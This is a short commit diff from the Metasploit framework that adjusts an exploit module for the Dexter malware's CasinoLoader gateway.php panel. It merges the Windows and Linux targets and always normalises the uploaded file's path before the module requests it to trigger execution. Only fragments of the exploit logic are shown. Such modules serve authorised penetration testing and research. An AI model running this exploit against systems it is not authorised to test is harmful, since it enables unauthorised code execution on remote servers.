Land #3011, @wchen-r7's fix for Dexter exploit
commit
c981bbeab9
|
@ -41,10 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['CasinoLoader gateway.php on Windows', {}],
|
||||
['CasinoLoader gateway.php on Linux', {}]
|
||||
['CasinoLoader gateway.php', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => "Feb 08 2014"
|
||||
))
|
||||
|
||||
|
@ -157,9 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if res and res.code == 200 and res.body =~ /a href="upload.php\?del=(.*)">/
|
||||
path = $1
|
||||
if target.name =~ /Linux/
|
||||
path = path.sub! "\\", "/"
|
||||
end
|
||||
path = path.sub! "\\", "/"
|
||||
target_path = normalize_uri(target_uri.path, path)
|
||||
print_status("#{peer} - Requesting: #{target_path}")
|
||||
send_request_raw({'uri' => normalize_uri(target_path)})
|
||||
|
|
Loading…
Reference in New Issue